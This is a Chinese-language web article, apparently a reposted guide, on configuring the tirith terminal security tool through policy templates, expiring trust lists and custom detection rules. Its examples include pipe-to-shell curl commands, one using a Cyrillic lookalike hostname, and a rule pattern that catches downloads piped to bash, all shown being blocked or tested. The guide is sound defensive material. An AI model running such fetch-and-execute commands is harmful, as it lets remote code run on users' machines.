新闻详情

新闻详情

首页 / 资讯中心 / 详情

企业级终端防御配置指南:tirith 策略系统 policy、trust 与自定义规则完整解析

发布时间:2026/10/1 14:27:00来源:尧图网络
企业级终端防御配置指南:tirith 策略系统 policy、trust 与自定义规则完整解析
企业级终端防御配置指南tirith 策略系统 policy、trust 与自定义规则完整解析【免费下载链接】tirithTerminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills/configs before they execute.项目地址: https://gitcode.com/gh_mirrors/tir/tirithtirith 是一款面向开发者与 AI Agent 的终端安全工具能在命令执行前拦截同形异义 URL、pipe-to-shell、ANSI 注入、混淆载荷与恶意 AI 技能配置。本篇指南带你用policy 策略文件、trust 信任列表和自定义规则三件套完成一套企业级终端防御配置。为什么终端需要一套策略系统浏览器早就能识别伪装域名终端却对 Unicode、ANSI 转义和不可见字符照单全收。tirith 站在终端的门口在命令真正执行之前完成分析与拦截$ curl -sSL https://іnstall.example-clі.dev | bash tirith: BLOCKED [CRITICAL] non_ascii_hostname, Cyrillic і (U0456) in hostname但一刀切不适合企业场景——Docker 的官方安装脚本也要 pipe 到 shellCI 里跑 npm 更是家常便饭。tirith 的策略系统让你按风险等级、按调用方、按域名精细放行与拦截。一键初始化3 步生成 tirith policy 文件在仓库根目录执行以下命令即可无需手写任何 YAMLtirith policy init # 生成 .tirith/policy.yaml tirith policy validate # 检查语法与 schema 错误 tirith policy test curl https://example.com | bash # 对策略做 dry-runpolicy init支持 7 个官方模板覆盖从个人开发者到大型组织的典型场景模板适用场景individual个人开发者宽松默认值startup小团队攻守平衡ci-strictCI 环境fail-closed、禁止绕过ai-agent-heavy重度使用 AI Agent 的环境oss-maintainer开源维护者重点审查贡献者风险mcp-strict锁定 MCP 服务器与工具信任enterprise企业级严格且默认启用包策略策略文件的查找顺序为先找当前目录向上直到仓库根的.tirith/policy.yaml再找用户级~/.config/tirith/policy.yaml。生成后可用tirith policy effective查看最终生效的策略解析结果确认每一条配置落地成什么行为。更多写法可参考 docs/cookbook.md 与 README.md 的 Configuration 章节。企业级模板读懂 enterprise.yaml 的 6 个关键开关crates/tirith/assets/policy_templates/enterprise.yaml 是一份带详细注释的严格策略核心开关如下配置项企业值作用fail_modeclosed无法分析时直接拦截绝不静默放行paranoia3提高全局检测灵敏度1-4 级allow_bypass_envfalse彻底禁用TIRITH0手动绕过strict_warntrue中风险警告必须显式确认后才执行severity_overrides多条将短链、pipe-to-shell 等规则升级为 CRITICALpackage_policy已激活供应链门禁拦截 7 天内新包、1 字符 typosquat、低下载量包等两个容易混淆的点值得注意severity_overrides只提升严重级别本身不强制拦截真正强制 block要靠action_overrides如把curl_pipe_shell设为block。escalation支持按会话历史升级处置同一规则 60 分钟内告警 5 次、或单条命令累积 3 个以上中风险发现自动从 warn 升级为 block。trust 信任列表默认过期、最小范围的放行机制如果每次curl get.docker.com | sh都要手动确认安全工具会变成团队的公敌。tirith 的trust命令提供了有期限的白名单源码位于 crates/tirith/src/cli/trust.rs# 最窄范围只信任这一条 URL默认 30 天后过期 tirith trust add raw.githubusercontent.com/org/repo/main/get.sh # 信任整个域名属于宽泛必须显式 --broad 确认 tirith trust add get.docker.com --broad --rule curl_pipe_shell # 永久信任 记录理由方便审计追溯 tirith trust add example.com --broad --permanent --reason 内部镜像, OPS-42设计亮点在于防自己手滑默认 30 天 TTL——信任会自然过期不主动维护的白名单不会永久残留范围分级——每条记录被归类为exact/substring/domain/wildcard/bare-TLD非exact级别必须加--broad宽泛放行永远是深思熟虑的选择可审计——trust list标记宽泛条目trust explain 域名查看覆盖范围与过期时间trust diff查看变更trust gc --expired清理过期项。日常巡检只需一条命令tirith trust list自定义规则用 when 谓词树写出企业专属检测内置规则之外.tirith/policy.yaml的custom_rules:让你用声明式 DSL 表达任意业务约束。每条规则由contextexec / paste / file、severity、title和判定条件组成条件可以是pattern:正则也可以是更强的when:语义谓词树custom_rules: - id: no_internal_pastebin context: exec severity: high title: 内部粘贴板禁止管道执行 when: all: - command.has_pipeline_to: [bash, sh] - url.host_matches: paste\\.corp\\.example$when:支持all:/any:/not:逻辑组合器常用谓词包括命令族command.has_pipeline_to、command.uses_sudoURL 族url.host、url.host_matches、url.reputation、url.domain_not_in包族package.ecosystem、package.name_matches、package.reputation文件族file.path_matches信誉类谓词读取的是本地签名威胁库热路径不发起任何网络请求。规则提交前务必先验证与 dry-runtirith rule validate # 检查形状与上下文覆盖 tirith rule test --rule no_internal_pastebin --input echo hi | bash tirith rule explain --rule no_internal_pastebintests/fixtures/custom_rules_dsl.yaml 提供了覆盖全部谓词族的 7 条完整示例是学习这套 DSL 的最佳起点策略加载与模板逻辑见 crates/tirith/src/cli/policy.rs。安全边界仓库策略只能收紧、不能放宽多仓库环境下最重要的设计是单向收紧原则仓库级的.tirith/policy.yaml只能比用户级策略更严格——试图扩大 allowlist、降低严重级别或关闭守卫的字段会被直接中和tirith policy effective会明确列出哪些字段被丢弃。只有用户级或组织级TIRITH_POLICY_ROOT策略有权放宽默认值。这意味着恶意贡献者无法通过 PR 修改策略文件给攻击命令开绿灯这是企业把策略文件纳入代码仓库的前提。总结一套可落地的企业级终端防御只需三层递进policytirith policy init --template enterprise起步按团队风险偏好微调fail_mode、paranoia与package_policytrust用带 TTL 的信任条目解决重复告警宽泛放行必须显式声明并记录理由custom_rules把内部域名、内部流程写成when:谓词rule validate把关后合入仓库。策略随代码版本化、信任随时间自然过期、检测随业务持续演进——这正是终端安全从能用走向企业级的完整路径。【免费下载链接】tirithTerminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills/configs before they execute.项目地址: https://gitcode.com/gh_mirrors/tir/tirith创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

Python仓库管理系统开发实战:数据库设计与事务保障库存一致 2026/10/2 5:16:57

Python仓库管理系统开发实战:数据库设计与事务保障库存一致

简介:一套面向计算机专业毕业设计及期末大作业场景的 Python 仓库管理系统源码项目,主要解决库存管理、出入库记录与基础数据维护等典型业务问题,适合正在做毕业设计的学生,也适合具备一定 Python 基础、需要综合项目练手的中级学…

阅读更多 →
双模型调用实战:GPT-6与Opus 5.5的接入与成本路由 2026/10/2 5:16:57

双模型调用实战:GPT-6与Opus 5.5的接入与成本路由

这个月模型圈最热闹的两件事,一个是 GPT-6 价格直接腰斩,另一个是 Opus 5.5 如约上线。两件事叠在一起,最直接的影响就是:以前那些只舍得让便宜模型干粗活、把贵模型留给关键任务的团队,现在终于可以放开手做双模型调用…

阅读更多 →
VSCode 开发 Keil MDK 工程:编译、调试与编码配置指南 2026/10/2 5:16:57

VSCode 开发 Keil MDK 工程:编译、调试与编码配置指南

1. 为什么要在 VSCode 里写 Keil 工程:先想清楚换取的是什么用 Keil MDK 做 STM32 或者 NXP、GD、瑞萨这类 Cortex-M 项目的人,几乎都经历过同一个瞬间:盯着 Vision 那个灰扑扑的编辑窗口,想同时选中三处变量名一起改,…

阅读更多 →
FEEMD快速集合经验模态分解:Python实现与工程优化 2026/10/2 5:16:57

FEEMD快速集合经验模态分解:Python实现与工程优化

简介:本资源面向具备Python基础、关注时间序列分析与信号处理的研发人员和工程师,提供一套基于FEEMD快速集合经验模态分解的完整项目实例。内容围绕非线性、非平稳信号的分解难题,涵盖算法原理、实现步骤、并行化优化及金融、环境监测、机械故…

阅读更多 →
Unity运行原理全解析:从游戏循环到渲染管线的核心机制 2026/10/2 5:16:56

Unity运行原理全解析:从游戏循环到渲染管线的核心机制

第一次用Unity的时候,我盯着那个灰不溜秋的编辑器,心里想的是:这玩意儿到底是怎么把我的代码变成屏幕上的画面的?后来做了几年项目再回头看,才发现很多人卡在入门阶段,不是因为代码写不出来,而是…

阅读更多 →
WY200挖掘机液压系统设计:从参数计算到回路控制全解析 2026/10/2 5:16:50

WY200挖掘机液压系统设计:从参数计算到回路控制全解析

液压系统设计是挖掘机整机开发里最核心、也最考验综合功底的一环。WY200这个型号,定位是20吨级的中型液压挖掘机,它的液压系统既要保证足够的挖掘力,又要兼顾动作速度、操控平顺性和燃油经济性,设计得好不好,直接决定整…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞 ✉